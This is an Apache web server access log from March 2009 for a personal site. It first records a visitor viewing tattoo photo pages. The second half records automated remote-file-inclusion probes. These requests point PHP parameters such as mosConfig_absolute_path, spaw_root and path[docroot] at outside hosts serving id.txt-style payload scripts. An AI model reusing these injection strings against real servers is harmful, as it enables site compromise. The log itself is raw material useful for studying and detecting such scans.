75.68.107.101 - - [12/Mar/2009:20:34:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:32 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:38 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:34:55 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.63.90.81 - - [12/Mar/2009:20:35:12 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:12 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:13 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:13 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1694 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:28 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:39 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:39 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:39 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.68.107.101 - - [12/Mar/2009:20:35:39 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.226.108.61 - - [12/Mar/2009:20:36:12 -0500] "GET /logs/access_log.1225756800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.63.90.81 - - [12/Mar/2009:20:36:19 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
66.194.251.253 - - [12/Mar/2009:20:36:25 -0500] "GET /logs//components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
66.194.251.253 - - [12/Mar/2009:20:36:25 -0500] "GET //components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:20:36:33 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:36:58 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:36:58 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:36:59 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:37:00 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:37:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
82.226.108.61 - - [12/Mar/2009:20:37:38 -0500] "GET /logs/access_log.1219363200//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.63.90.81 - - [12/Mar/2009:20:37:45 -0500] "GET /logs/access_log.1218931200/?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
58.226.23.55 - - [12/Mar/2009:20:38:01 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
58.226.23.55 - - [12/Mar/2009:20:38:56 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
80.67.26.159 - - [12/Mar/2009:20:39:12 -0500] "GET /logs/access_log.1217289600%20%20/?DOCUMENT_ROOT=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:20:39:12 -0500] "GET /?DOCUMENT_ROOT=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:20:39:13 -0500] "GET /logs/?DOCUMENT_ROOT=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:20:41:11 -0500] "GET /logs/access_log.1217203200/?DOCUMENT_ROOT=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:20:41:25 -0500] "GET /logs/access_log.1217289600/?DOCUMENT_ROOT=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
75.125.245.26 - - [12/Mar/2009:20:41:37 -0500] "GET /logs/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:20:41:37 -0500] "GET /errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:20:41:37 -0500] "GET /logs/access_log.1217721600/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.125.245.26 - - [12/Mar/2009:20:41:54 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://mrkz.t35.com/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.64.152 - - [12/Mar/2009:20:46:05 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
77.93.208.64 - - [12/Mar/2009:20:46:53 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
77.93.208.64 - - [12/Mar/2009:20:46:53 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.93.208.64 - - [12/Mar/2009:20:46:53 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.76.163.60 - - [12/Mar/2009:20:47:25 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:20:47:25 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:20:47:25 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:20:47:27 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:20:47:27 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.76.163.60 - - [12/Mar/2009:20:47:27 -0500] "GET /logs/access_log.1219536000//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
77.93.208.64 - - [12/Mar/2009:20:47:50 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.38.55.195 - - [12/Mar/2009:20:48:02 -0500] "GET /logs///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.38.55.195 - - [12/Mar/2009:20:48:02 -0500] "GET /logs/access_log.1216944000///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.55.195 - - [12/Mar/2009:20:48:03 -0500] "GET ///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.63.90.81 - - [12/Mar/2009:20:49:35 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.63.90.81 - - [12/Mar/2009:20:49:36 -0500] "GET //ask_password.php?dir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.63.90.81 - - [12/Mar/2009:20:49:45 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.63.90.81 - - [12/Mar/2009:20:49:46 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:20:49:47 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 328 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.226.23.55 - - [12/Mar/2009:20:49:48 -0500] "GET //ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 301 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.63.90.81 - - [12/Mar/2009:20:50:01 -0500] "GET /logs/access_log.1212019200//ask_password.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
